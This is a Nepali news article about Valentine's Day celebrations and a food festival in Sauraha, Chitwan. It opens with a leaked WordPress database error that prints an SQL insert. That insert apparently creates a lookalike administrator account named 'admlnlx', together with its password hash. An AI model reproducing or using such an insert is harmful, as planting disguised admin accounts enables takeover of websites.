WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjMUNY6yuvBiA900994gE1Q4mAbi630', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:42:11', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ३–
आज प्रणय दिवस अर्थात् भ्यालेन्टाइन डे विश्वभर आपसमा प्रेमभावपूर्ण उपहार साटासाट गरेर मनाइँदैछ । चितवनको सौराहामा पनि विशेष रुपमा प्रेम दिवस मनाईदै छ ।
हेरक वर्ष १४ फेब्रअरीका दिन प्रेमीप्रेमिकासँगै आफन्त र परिवारजनमा प्रेम, सद्भाव र भातृत्व साटासाट गरी प्रणय दिवस मनाउने गरिन्छ । विशेष गरी युवायुवतीले प्रेम प्रस्ताव राख्ने र आपसमा प्रेमभाव प्रस्तुत गर्ने पर्वकै रुपमा प्रणय दिवस मनाइन्छ ।
युवायुवतीले प्रेमिप्रेमिकालाई प्रेमको प्रतीक गुलबको फूल उपहार दिएर प्रेमभाव साटासाट गर्ने गर्दछन् । युवापुस्तामा बढी लोकप्रिय रहेको यो दिवसमा नयाँ प्रेमी प्रेमीकाले प्रेम प्रस्ताव राख्ने दिनका रुपमा लिने गरेका छन् ।
पछिल्ला वर्षहरुमा प्रणय दिवसका नाममा विकृति बढ्न थालेको टिप्पणी पनि हुँदै आएको छ ।
प्रेमभक्त भ्यालेन्टाइनलाई मृत्युदण्ड दिएको सम्झनामा प्रणय दिवस मनाउन थालिएको यो दिवस अहिले विश्वभर चर्चित रहेको छ । चितवनको पर्यटकीय नगरी सौराहा भ्यालेन टाईन डे अवसरमा भरिभराउँछ । यहाँ आयोजित सौराहा फुड फेष्टिवलले झनै प्रेमिल जोडीहरुलाई रमाईलो वातावरण बनेको छ ।